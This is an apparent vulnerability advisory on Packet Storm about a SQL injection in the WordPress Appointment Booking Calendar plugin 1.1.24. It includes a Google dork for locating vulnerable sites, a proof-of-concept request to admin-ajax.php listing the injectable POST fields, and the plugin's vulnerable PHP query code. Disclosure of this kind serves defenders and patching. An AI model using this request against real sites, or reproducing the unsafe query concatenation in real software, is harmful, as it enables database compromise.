WordPress Appointment Booking Calendar plugin version 1.1.24 suffers from a remote SQL injection through addslashes.
f50b726fd5aa53e19ad3f34f743c544fe51d0489b26fd23bee63b91da753dccc# Exploit Title: WordPress appointment-booking-calendar <=1.1.24 - SQL injection through ´addslashes´ (wordpress ´wp_magic_quotes´ function)
# Date: 2016-01-28
# Google Dork: Index of /wordpress/wp-content/plugins/appointment-booking-calendar/
# Exploit Author: Joaquin Ramirez Martinez [now i0 security-lab]
# Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Vendor: CodePeople.net
# Vebdor URI: http://codepeople.net
# Version: 1.1.24
# OWASP Top10: A1-Injection
# Tested on: windows 10 + firefox + sqlmap 1.0.
===================
PRODUCT DESCRIPTION
===================
"Appointment Booking Calendar is a plugin for **accepting online bookings** from a set of **available time-slots in
a calendar**. The booking form is linked to a **PayPal** payment process.
You can use it to accept bookings for medical consultation, classrooms, events, transportation and other activities
where a specific time from a defined set must be selected, allowing you to define the maximum number of bookings
that can be accepted for each time-slot."
(copy of readme file)
======================
EXPLOITATION TECHNIQUE
======================
remote
==============
SEVERITY LEVEL
==============
critical
================================
TECHNICAL DETAILS && DESCRIPTION
================================
A SQL injection flaw was discovered within the latest WordPress appointment-booking-calendar plugin version 1.1.24.
The flaw were found in the function that is executed when the action ´cpabc_appointments_calendar_update´ is called.
The action is added with ´init´ tag, so it function is called every time when parameter
´action=cpabc_appointments_calendar_update´ appear in the query string (GET request) or POST request.
Exploiting succesful this vulnerability we need a vulnerable wordpress site with especial character set for to bypass
the ´addslashes´ function (called automatically and applied in all variables $_POST and $_GET by wordpress ´wp_magic_quotes´
function) and we need own a calendar too (could be owned by privilege escalation) or be a user with ´edit_pages´ permission (admin|editor).
The security risk of SQL injection vulnerabilities are extremely because by using this type of flaw, an attacker
can compromise the entire web server.
================
PROOF OF CONCEPT
================
An unauthenticated attacker can make a request like...
http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=cpabc_appointments_check_posted_data
&cpabc_calendar_update=1&id=<owned calendar id>
Example:
Exploiting simple SQL injection:
http://localhost/wordpress/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update
&cpabc_calendar_update=1&id=1
Post data:
specialDates=&workingDates&restrictedDates&timeWorkingDates0&timeWorkingDates1&timeWorkingDates2
&timeWorkingDates3&timeWorkingDates4&timeWorkingDates5& imeWorkingDates6
All post variables are vulnerable to SQLi with ´addslashes´ bypass.
===============
VULNERABLE CODE
===============
located in ´cpabc_appointments.php´
function cpabc_appointments_calendar_update() {
global $wpdb, $user_ID;
if ( ! isset( $_GET['cpabc_calendar_update'] ) || $_GET['cpabc_calendar_update'] != '1' )
return;
$calid = intval(str_replace (CPABC_TDEAPP_CAL_PREFIX, "",$_GET["id"]));
if ( ! current_user_can('edit_pages') && !cpabc_appointments_user_access_to($calid) )
return;
echo "sa";
cpabc_appointments_add_field_verify(CPABC_TDEAPP_CONFIG, 'specialDates');
//@ob_clean();
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Pragma: no-cache");
if ( $user_ID )
$wpdb->query("update ".CPABC_TDEAPP_CONFIG." set specialDates='".$_POST["specialDates"]."',".CPABC_TDEAPP_CONFIG_WORKINGDATES."='"
.$_POST["workingDates"]."',".CPABC_TDEAPP_CONFIG_RESTRICTEDDATES."='".$_POST["restrictedDates"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES0.
"='".$_POST["timeWorkingDates0"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES1."='".$_POST["timeWorkingDates1"]."',".
CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES2."='".$_POST["timeWorkingDates2"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES3."='"
.$_POST["timeWorkingDates3"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES4."='".$_POST["timeWorkingDates4"]."',"
.CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES5."='".$_POST["timeWorkingDates5"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES6
."='".$_POST["timeWorkingDates6"]."' where ".CPABC_TDEAPP_CONFIG_ID."=".$calid);
exit();
}
===========
Note:
cpabc_appointments_calendar_update2() function is vulnerable too by the same exploit explaned here.
==========
CREDITS
==========
Vulnerability discovered by:
Joaquin Ramirez Martinez [i0 security-lab]
strparser[at]gmail[dot]com
https://www.facebook.com/I0-security-lab-524954460988147/
https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q
========
TIMELINE
========
2016-01-08 vulnerability discovered
2016-01-24 reported to vendor
2016-01-27 released plugin version 1.1.25
2016-01-28 public disclousure
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed